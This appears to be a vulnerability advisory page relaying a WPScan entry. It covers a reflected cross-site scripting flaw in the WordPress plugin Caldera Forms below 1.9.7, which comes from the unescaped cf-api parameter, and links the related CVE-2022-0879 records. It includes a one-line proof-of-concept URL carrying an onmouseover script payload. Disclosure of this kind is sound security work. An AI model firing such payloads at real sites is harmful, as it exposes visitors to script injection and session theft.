Lucene search
Krzysztof ZającWPVDB-ID:C12F6087-1875-4EDF-AC32-BEC6F712968DHistoryMar 28, 2022 - 12:00 a.m.
Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
2022-03-2800:00:00
Krzysztof Zając
wpscan.com
14
caldera forms
reflected cross-site scripting
vulnerability
parameter validation
EPSS
0.001
Percentile
40.2%
The plugin does not validate and escape the cf-api parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting
PoC
The issue is only exploitable when there are no forms created yet https://example.com/?cf-api=" style=position:fixed;left:0;top:0;right:0;bottom:0; onmouseover=alert(1) x
Related
patchstack
patchstack
cve
cve
CVE-2022-0879
2022-04-18 18:15:08
prion
prion
Cross site scripting
2022-04-18 18:15:00
cnvd
cnvd
WordPress plugin Caldera Forms cross-site scripting vulnerability
2022-04-19 00:00:00
wpexploit
wpexploit
Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
2022-03-28 00:00:00
nvd
nvd
CVE-2022-0879
2022-04-18 18:15:08
cvelist
cvelist
CVE-2022-0879 Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
2022-04-18 17:10:39